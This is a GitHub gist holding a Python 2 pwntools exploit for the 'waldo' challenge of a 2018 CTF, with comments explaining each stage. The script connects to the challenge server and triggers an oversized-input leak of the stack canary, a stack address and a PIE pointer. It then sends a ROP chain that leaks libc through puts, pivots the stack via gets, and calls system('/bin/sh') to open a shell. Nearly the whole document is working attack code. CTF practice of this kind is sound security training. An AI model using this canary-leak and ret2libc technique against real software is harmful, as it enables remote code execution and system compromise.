@sudhackar
Created April 25, 2018 16:30
Blazeme ctf 2018 waldo pwn
from pwn import *
# has some issues, works only 1/2 the times
# Python 2 / pwntools script: print statements, xrange, raw_input and
# str.encode("hex") below all require Python 2.
context(arch='amd64', os='linux', log_level='debug')
# s = remote('127.0.0.1', 5000)
# Remote service used during the CTF; the commented line above is the local
# test target.
s = remote('waldo.420blaze.in',420)
# raw_input()
# Opening dialogue: answer the first "(y/N) " prompt, reply "-1 -1" to the
# "? " prompt, then answer the second "(y/N) " prompt. What each prompt asks
# is not visible here -- these strings are only what the script waits for.
s.recvuntil("(y/N) ")
s.sendline("y")
s.recvuntil("? ")
s.sendline("-1 -1")
s.recvuntil("(y/N) ")
s.sendline("y")
def check(c=0):
    """Read one board dump from the service, locate the 'W' cell and answer with its position.

    Uses the module-level connection ``s``. One header line is skipped, then
    rows are read until a row of length <= 1 terminates the board; the last
    'W' seen wins. The reply is "row col " followed by ``c`` filler bytes
    ('A'), so the default ``c=0`` sends a plain move. Prints the (row, col)
    tuple that was sent.
    """
    s.recvline()
    col, row = 0, 0
    row_idx = 0
    line = s.recvline().strip()
    while True:
        pos = line.find("W")
        if pos != -1:
            col, row = pos, row_idx
        if len(line) <= 1:
            break
        row_idx += 1
        line = s.recvline().strip()
    s.recvuntil("? ")
    s.sendline("%d %d %s" % (row, col, "A" * c))
    print (row, col)
# Play 30 rounds with plain moves so the game advances; the trailing comma
# keeps the round counter on one line (Python 2 print).
for _ in xrange(30):
    print _,
    check()
print s.recvline()
# Same move, but with 0x78 'A' bytes appended after the coordinates. From this
# script alone it looks like the oversized answer is what makes the next board
# dump carry stack contents (the "MA"-tagged fields parsed below); confirm
# against the binary.
check(0x78)
# Progress marker (meaning not documented by the author).
print "32"
# Skip two lines before the board dump that follows the oversized move.
s.recvline()
s.recvline()
x,y = 0,0
cnt = 0
# Values recovered from the board dump. The author's names say what each
# 8-byte field was believed to be (stack canary, a stack pointer, a code
# pointer inside the PIE image); the script itself cannot show that, so
# confirm against the binary.
canary, stack, pie = 0, 0, 0
line = s.recvline().strip()
# Hex-dump every row so the raw leak can be inspected in the debug log.
print line.encode("hex")
if "W" in line:
    x = line.find("W")
    y = cnt
size = len(line)
# "MA" is the marker the author keys on; three little-endian u64 fields
# follow it at +2, +10 and +18. Each slice is bounds-checked against the
# row length first so a short row cannot make u64() fail on a partial value.
if "MA" in line:
    l = line.find("MA")
    success("found %x %x" %(l, size))
    if l+2+8 <= size:
        canary = u64(line[l+2:l+10])
    if l+2+16 <= size:
        stack = u64(line[l+10:l+18])
    if l+2+24 <= size:
        pie = u64(line[l+18:l+26])
# Remaining rows; a row of length <= 1 ends the board. The "not canary" /
# "not stack" / "not pie" guards keep the first non-zero value found rather
# than the last.
while len(line) > 1:
    cnt += 1
    line = s.recvline().strip()
    print line.encode("hex")
    if "W" in line:
        x = line.find("W")
        y = cnt
    size = len(line)
    if "MA" in line:
        l = line.find("MA")
        success("found %x %x" %(l, size))
        if l+2+8 <= size and not canary:
            canary = u64(line[l+2:l+10])
        if l+2+16 <= size and not stack:
            stack = u64(line[l+10:l+18])
        if l+2+24 <= size and not pie:
            pie = u64(line[l+18:l+26])
success("canary %x, stack %x, pie %x" % (canary, stack, pie))
# Answer this round normally so the game continues.
s.recvuntil("? ")
s.sendline(("%d %d") % (y, x))
print (y,x)
# Manual override: each prompt reads one hex value from stdin and replaces
# the parsed value when non-zero ("0" keeps what was parsed).
# NOTE(review): int("", 16) raises ValueError, so an empty reply aborts the
# run instead of keeping the parsed value.
print "canary"
x = int(raw_input(), 16)
if x:
    canary = x
print "stack"
x = int(raw_input(), 16)
if x:
    stack = x
print "pie"
x = int(raw_input(), 16)
if x:
    pie = x
# check()
# Rebase: the leaked code pointer is presumably 0xc43 past the image base
# (offset taken from the binary, not visible here); subtracting it gives the
# PIE base that every address below is built from.
pie = pie - 0xc43
success("canary %x, stack %x, pie %x" % (canary, stack, pie))
# Local copy of the challenge binary, used only for its PLT/GOT offsets
# (all relative to the PIE base recovered above).
# Defender's view of what this chain relies on: the binary imports gets()
# (unbounded read, see e.plt['gets'] below), and the stack canary and PIE
# it was built with are both neutralised by the information leak parsed
# above. A bounded read in place of gets() removes the overwrite this stage
# depends on.
e = ELF("./waldo")
# Stage 1 frame overwrite: 72 bytes reach the canary slot, which is rewritten
# with the leaked value so the stack-protector check passes; the next 8 bytes
# cover the slot after it (presumably the saved rbp).
payload = "A"*72+p64(canary)+"B"*8
# ROP chain, part 1: puts(puts@got) prints the resolved libc address of puts.
payload += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload += p64(pie+e.got['puts'])
payload += p64(pie+e.plt['puts'])
# Part 2: gets(pie+0x202c00) reads the second-stage chain (payload2) into a
# fixed address inside the binary's image (presumably a writable section
# such as .bss -- confirm against the binary).
payload += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload += p64(pie+0x202c00)
payload += p64(pie+e.plt['gets'])
# Part 3: stack pivot. rsp <- pie+0x202c00, so execution continues from
# payload2. The gadget also pops r13/r14/r15 from the new stack, which is why
# payload2 begins with 24 filler bytes.
payload += p64(pie+0x000000000000110d) # 0x000000000000110d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
payload += p64(pie+0x202c00)
s.sendline(payload)
# Skip three lines of output, then read the address puts() printed. puts
# stops at the first NUL byte, so the line is short; zero-pad to 8 bytes
# before unpacking.
s.recvline()
s.recvline()
s.recvline()
y = s.recvline().strip()
y += "\x00"*(8-len(y))
puts_leak = u64(y)
success("puts leak : %x" % puts_leak)
# Symbol offsets for the remote libc; which build they belong to is not
# recorded here. libc base = puts_leak - offset_puts.
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
# Stage 2, consumed by gets() above and run after the pivot: 24 bytes land
# in r13/r14/r15, then puts("/bin/sh") followed by system("/bin/sh").
payload2 = "A"*24
payload2 += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload2 += p64(puts_leak-offset_puts+offset_str_bin_sh)
payload2 += p64(pie+e.plt['puts'])
payload2 += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload2 += p64(puts_leak-offset_puts+offset_str_bin_sh)
payload2 += p64(puts_leak-offset_puts+offset_system)
s.sendline(payload2)
s.interactive()